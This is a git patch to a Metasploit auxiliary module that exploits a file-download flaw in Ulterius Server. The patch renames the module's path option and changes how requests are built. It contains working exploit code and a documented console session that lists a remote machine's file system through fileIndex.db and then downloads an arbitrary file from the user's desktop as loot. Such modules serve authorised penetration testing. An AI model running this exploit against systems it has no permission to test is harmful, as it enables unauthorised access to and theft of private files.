From 949b474a0ac1e3e845b0f1439cd2870e1e8d07cc Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 15 Feb 2018 16:31:09 -0600 Subject: [PATCH] Avoid target_uri.path It doesn't look like target_uri.path is suitable for this scenario, because it causes our input to be modified and hard to use. --- .../admin/http/ulterius_file_download.md | 10 +++++----- .../admin/http/ulterius_file_download.rb | 18 +++++++++++++----- 2 files changed, 18 insertions(+), 10 deletions(-) diff --git a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md index db946256cc..4c899443b4 100644 --- a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md +++ b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md @@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa ## Options -**TARGETURI** +**PATH** This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`) @@ -36,7 +36,7 @@ Note: If you are using relative paths, use three periods when traversing down a - [ ] `set rhost ` - [ ] `run` - [ ] Verify loot contains file system paths from remote file system. -- [ ] `set targeturi '/:///'` +- [ ] `set path ':///'` - [ ] `run` - [ ] Verify contents of file @@ -53,11 +53,11 @@ msf5 auxiliary(admin/http/ulterius_file_download) > run [*] Starting to parse fileIndex.db... [*] Remote file paths saved in: filepath0 [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/C:/users/pwnduser/desktop/tmp.txt' -targeturi => /C:/users/pwnduser/desktop/tmp.txt +msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt' +path => C:/users/pwnduser/desktop/tmp.txt msf5 auxiliary(admin/http/ulterius_file_download) > run -[*] /C:/users/pwnduser/desktop/tmp.txt +[*] C:/users/pwnduser/desktop/tmp.txt [*] File contents saved: filepath1 [*] Auxiliary module execution completed msf5 auxiliary(admin/http/ulterius_file_download) > diff --git a/modules/auxiliary/admin/http/ulterius_file_download.rb b/modules/auxiliary/admin/http/ulterius_file_download.rb index fc9356adaa..255650bbb5 100644 --- a/modules/auxiliary/admin/http/ulterius_file_download.rb +++ b/modules/auxiliary/admin/http/ulterius_file_download.rb @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ Opt::RPORT(22006), - OptString.new('TARGETURI', [true, 'Path to the file to download', '/.../fileIndex.db']), + OptString.new('PATH', [true, 'Path to the file to download', '/.../fileIndex.db']), ]) end @@ -73,9 +73,16 @@ class MetasploitModule < Msf::Auxiliary end def run + path = datastore['PATH'] + # Always make sure there is a starting slash so as an user, + # we don't need to worry about it. + path = "/#{path}" if path && path[0] != '/' + + print_status("Requesting: #{path}") + begin res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path), + 'uri' => normalize_uri(path), 'method' => 'GET' }) rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, @@ -83,14 +90,15 @@ class MetasploitModule < Msf::Auxiliary vprint_error("Failed: #{e.class} - #{e.message}") return end + if res && res.code == 200 - if target_uri.path =~ /fileIndex\.db/i + if path =~ /fileIndex\.db/i inflate_parse(res.body) else - print_status(target_uri.path) - myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, target_uri.path, 'Remote file system') + myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, path, 'Remote file system') print_status("File contents saved: #{myloot.to_s}") end end end + end